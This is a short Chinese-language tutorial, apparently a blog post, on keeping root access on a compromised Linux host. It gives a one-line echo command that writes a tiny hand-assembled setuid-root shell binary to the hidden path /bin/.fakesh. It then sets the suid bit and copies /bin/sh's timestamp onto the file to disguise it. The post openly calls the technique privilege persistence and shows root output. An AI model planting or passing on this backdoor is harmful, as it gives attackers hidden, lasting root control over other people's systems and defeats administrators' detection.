原理

当获得root权限之后,可对fakesh设置suid标志位

之后就可以用fakesh在低权限下获得root权限

使用场景

linux提权后,一般情况下都需要交互式环境,因为提权程序提升权限后会执行设定的命令。

但总不能每次执行命令,都运行一次提权程序。

所以可以提权后设定suid标志,后续使用fakesh执行命令。

也可用于权限维持

设置suid标志位,并修改日期

1
2
3
4
echo -e -n "\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00>\x00\x01\x00\x00\x00x\x00@\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x008\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x9b\x00\x00\x00\x00\x00\x00\x00\xbe\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00H1\xffjiX\x0f\x05j;X\xe8\x08\x00\x00\x00/bin/sh\x00_H\x8dt$\x08H1\xc9\x0f\x05" > /bin/.fakesh
chown 0:0 /bin/.fakesh
chmod 4755 /bin/.fakesh
touch /bin/.fakesh -r /bin/sh

使用

/bin/.fakesh -c id

输出

1
2
➜  /bin/.fakesh -c id 
uid=0(root) gid=1000(test) ...

PS

为什么这么小,因为用汇编写的。